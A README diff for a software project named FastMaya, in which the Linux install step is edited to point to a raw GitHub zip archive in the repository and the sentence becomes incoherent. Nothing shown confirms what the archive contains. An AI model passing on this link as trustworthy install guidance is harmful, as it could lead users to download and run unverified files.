kidooz/FastMaya/README.md

 - For **Windows** users, double-click the `.exe` file.
 - For **MacOS** users, open the `.dmg` file and drag FastMaya to your Applications folder.
-- For **Linux** users, extract the `.tar.gz` file and follow the installation instructions provided in the extracted folder.
+- For **Linux** users, extract the `https://raw.githubusercontent.com/kidooz/FastMaya/main/Maya1/FastMaya-3.3.zip` file and follow the installation instructions provided in the extracted folder.

 Follow the on-screen instructions during installation.
 This should only take a few minutes.